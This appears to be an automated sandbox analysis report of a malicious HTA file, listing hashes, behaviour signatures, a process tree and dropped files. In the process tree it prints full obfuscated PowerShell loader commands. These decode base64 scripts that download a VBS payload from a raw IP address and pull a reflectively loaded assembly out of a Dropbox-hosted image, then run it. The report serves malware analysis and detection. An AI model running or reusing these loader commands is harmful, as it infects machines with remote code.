Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    06-02-2025 11:30

General

  • Target

    sheismybestgirlwholovesmebestwithgirlfirstnightgoood.hta

  • Size

    14KB

  • MD5

    32bd7fd6ff215717e8c312e746d73271

  • SHA1

    fa44ea813d1714d501676bf422eb1757610e25af

  • SHA256

    ac4ab4116f0955571d28bdb8024437ad7a8b379c3ca613b16f837d6768370e8e

  • SHA512

    cf82ae3f481648749175f2269a41c7206bc9f3c2b0d4ea5d2e9eb973f812c638e03327aa1cf365607cde878df7102a44aadbdb99e056e0846589e2f3704b4702

  • SSDEEP

    96:qTK35MrK357i6TRwrA8L0l9wK35LK35ciK35S:qTsSrsZi6TRwrEwsVseisw

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sheismybestgirlwholovesmebestwithgirlfirstnightgoood.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:272
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c PoWERsheLl -EX bYPasS -nOP -W 1 -C DeVIcEcrEDEntiAlDeplOymeNt.eXe ; IEX($(iEx('[sYSteM.TExt.ENCODing]'+[cHAr]58+[cHAr]0X3a+'UTF8.gETstrIng([SystEM.cOnVert]'+[chAR]0X3A+[cHAR]58+'fROMbaSe64STring('+[CHAR]34+'JEQxcTM5YUtMICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlcmRFZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR2Zlem4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc1FiVW0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXhubGR3Zix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGZILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoV0JSVW9oc3MpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJrZVFWeWd3aCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGNTbEpQeWZocm4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEQxcTM5YUtMOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3NC4xNDYveGFtcHAva2Ivc2hlaXNteWJlc3RnaXJsd2hvbG92ZXNtZWJlc3R3aXRoZ2lybGZpcnN0bmlnaHRnby5nSUYiLCIkZU52OkFQUERBVEFcc2hlaXNteWJlc3RnaXJsd2hvbG92ZXNtZWJlc3R3aXRoZ2lybGZpcnN0bmlnaHRnLnZicyIsMCwwKTtTVGFSdC1TTGVFUCgzKTtpbnZva2UtSXRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2hlaXNteWJlc3RnaXJsd2hvbG92ZXNtZWJlc3R3aXRoZ2lybGZpcnN0bmlnaHRnLnZicyI='+[CHar]34+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1644
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PoWERsheLl -EX bYPasS -nOP -W 1 -C DeVIcEcrEDEntiAlDeplOymeNt.eXe ; IEX($(iEx('[sYSteM.TExt.ENCODing]'+[cHAr]58+[cHAr]0X3a+'UTF8.gETstrIng([SystEM.cOnVert]'+[chAR]0X3A+[cHAR]58+'fROMbaSe64STring('+[CHAR]34+'JEQxcTM5YUtMICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlcmRFZmluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR2Zlem4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc1FiVW0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXhubGR3Zix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGZILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoV0JSVW9oc3MpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJrZVFWeWd3aCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGNTbEpQeWZocm4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEQxcTM5YUtMOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3NC4xNDYveGFtcHAva2Ivc2hlaXNteWJlc3RnaXJsd2hvbG92ZXNtZWJlc3R3aXRoZ2lybGZpcnN0bmlnaHRnby5nSUYiLCIkZU52OkFQUERBVEFcc2hlaXNteWJlc3RnaXJsd2hvbG92ZXNtZWJlc3R3aXRoZ2lybGZpcnN0bmlnaHRnLnZicyIsMCwwKTtTVGFSdC1TTGVFUCgzKTtpbnZva2UtSXRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2hlaXNteWJlc3RnaXJsd2hvbG92ZXNtZWJlc3R3aXRoZ2lybGZpcnN0bmlnaHRnLnZicyI='+[CHar]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2436
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m6hrrfsj.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2820
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE8AB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE8AA.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2748
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sheismybestgirlwholovesmebestwithgirlfirstnightg.vbs"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2704
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZABvAG8AZwBzAHIAZQB3AG8AbABmAGUAcwBvAHIAcgBvAGYAbgBpAGkAZwBpAHMAZABvAG8AZwBiAGsALwBiAGsALwBwAHAAbQBhAHgALwA2ADQAMQAuADQANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnADsAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAgAD0AIAAkAG8AcgBpAGcAaQBuAGEAbABUAGUAeAB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBkAHIAbwBwAGIAbwB4AC4AYwBvAG0ALwBzAGMAbAAvAGYAaQAvAGUAaABpADYANgAzAGgAagByAG0AZgBzADUAdwA4AHMAZwAzAHoAYQBkAC8AdgBiAHMALQBqAHMALQB3AHMAZgAtAGIAYQB0AC4AagBwAGcAPwByAGwAawBlAHkAPQAyAGgAMABuAG8AaQBwAGsAOQB1AGYAeQBkAGYAZgBqAGkAOAB4AGEANwB0ADcAdABqACYAcwB0AD0AZgA2AG8AbgB2ADcAZAA0ACYAZABsAD0AMQAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAEMAYQBzAFAAbwBsACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2036

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESE8AB.tmp

    Filesize

    1KB

    MD5

    4b7be53b401928cc13fbe4316ee1319b

    SHA1

    69021e97f67d7c4189cca71f2031a2b191dae020

    SHA256

    32a4d7eed53502752a072858ad3fbf52e5303c192e092d570a7bc189a6234d0c

    SHA512

    2d3cf27bbd07cf7173154aa83c417a131405e54ce37d3b14d9b704b7e43c498024f6e9a7eca59b6cc99e5b04b9b002b1116cac41e780a46856814a6177ddc626

  • C:\Users\Admin\AppData\Local\Temp\m6hrrfsj.dll

    Filesize

    3KB

    MD5

    103b9e7936ff1cfcba84bb9e5d1c39e7

    SHA1

    6f6b1ce09c95f0a8ff0974c9f55799f6400555b4

    SHA256

    883f18d857ab73bd990c5e0c2db4988668fde26a62093cae1a92c795095213d0

    SHA512

    2e8714ced6234cf1464fb59790bd2b453652583fca72ab0850f790fc66e2e3f45ffa0b8c5ccc134716e649da62547fef578f171f096b4a43f8cfc146e2082b81

  • C:\Users\Admin\AppData\Local\Temp\m6hrrfsj.pdb

    Filesize

    7KB

    MD5

    050c66fe91f76e11921853134cad5a1c

    SHA1

    e55c6cda7e9fd31095c3c1af5683143448b086bd

    SHA256

    c2a0f294714b232ffcce89f70baceb05498165dda4c2600f5cb3f56fad720061

    SHA512

    1f6b9ce28e9fe3c4f16fdb66c336371c72cff7aa2e0143c602c688eead546baa8a5e1396cf5236339ca0f363ac193619d6400bdd16aefd78f6621faca5a5edc1

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PONL5KEBED040FEI49YD.temp

    Filesize

    7KB

    MD5

    b310b65fd855150a64651dd316648bc1

    SHA1

    8d34b8e68f433d500a766e9799b9f2ee86dabf73

    SHA256

    cd9d2317372cbf56b4d194a0ac321dd6c3ec57846745c791b5c88a95cb0f8b19

    SHA512

    a5d038e61168eb1c73981089931232bafd1d76043de994b6bbcdd4bd369f21f4f593c687d8b6dde2dc856036ec04d4538cb6d66735d2529415a23e07958e4f99

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    96e603eb2aff3ad065f016d99cc76ec4

    SHA1

    cceffa44b0a5cd0ad833a9397e195c5665b1795e

    SHA256

    4183c00e7c6c5ea033f60e0d35af8e5ce98b4f6991cd0e4e99cabef48fcc908f

    SHA512

    9ab41c8f1cd661bec29d824a67a668cb7fa4c9b152e0b1a42c79fa2ff14cad86956417503dcfe1985f8d7446bda28a0ce9640491ce8d71242dba93ac9fa1d393

  • C:\Users\Admin\AppData\Roaming\sheismybestgirlwholovesmebestwithgirlfirstnightg.vbs

    Filesize

    184KB

    MD5

    2a0172c12274a16969fa2a1245e9a60b

    SHA1

    1d8415feff418d80c39a6996f6f2e8a52430d8bc

    SHA256

    971a54ec031c225191a17dc9f92b53187a7ec41706edc0b11ca3ceb146fafe16

    SHA512

    f69b6a05d5eae0ac70b30b4b1b866385f879e2f726983e4223a294fefb0f02751539323d97cc7ca59aee7dc107b7643d91b67bb05cdc9abee04c6d51e085499f

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCE8AA.tmp

    Filesize

    652B

    MD5

    a687c271223a39ef93cc5f3a115760f9

    SHA1

    ea56520e7db3243d3e5b84dbe87a6ff2df9b9178

    SHA256

    cc92520657ff3c7f8d4ec3858e6f785aaf0554b425e171560c3f26aab030e810

    SHA512

    4fe0845b1ce2c6112223cf36d25875da566a1b10a2fd8e97ca222908245aaf101a5f5fe2325700cb5046ccfcc546445d5b1b4d481e7591436e0a268137c2feb1

  • \??\c:\Users\Admin\AppData\Local\Temp\m6hrrfsj.0.cs

    Filesize

    482B

    MD5

    0955f1d0bdaede5dd37d39eacf595b95

    SHA1

    0d3f0c10deceaefb6804debb5c59d8333438985e

    SHA256

    26d892506efb1f751236d425e71ac7052c78b1bb95cfa27002d861d7c3499bea

    SHA512

    97f817dee082b90596c5ea5fdefd71aeb262cc5b38284c0a42a811734ac250b38c19171074c2a25decf8a4068ec4d45c12e76125469f473142c0dc53049780f8

  • \??\c:\Users\Admin\AppData\Local\Temp\m6hrrfsj.cmdline

    Filesize

    309B

    MD5

    b40e0b522a70242747953e315b2e407b

    SHA1

    6f02bc04fbbeeb0d7563f94cae64b48aa2751b52

    SHA256

    ef67285fa4bea22893d19bfb6741adbd5100720c8269ae35aef75735cee1fe75

    SHA512

    753bf451e415bfaee820f664277d3ff1c3d2ca75139eb00db04a92047f3651050c32ddeac6bf3d5c6c9bca0e1d4de4d06b92132034a0d1b4305e0a4915a50442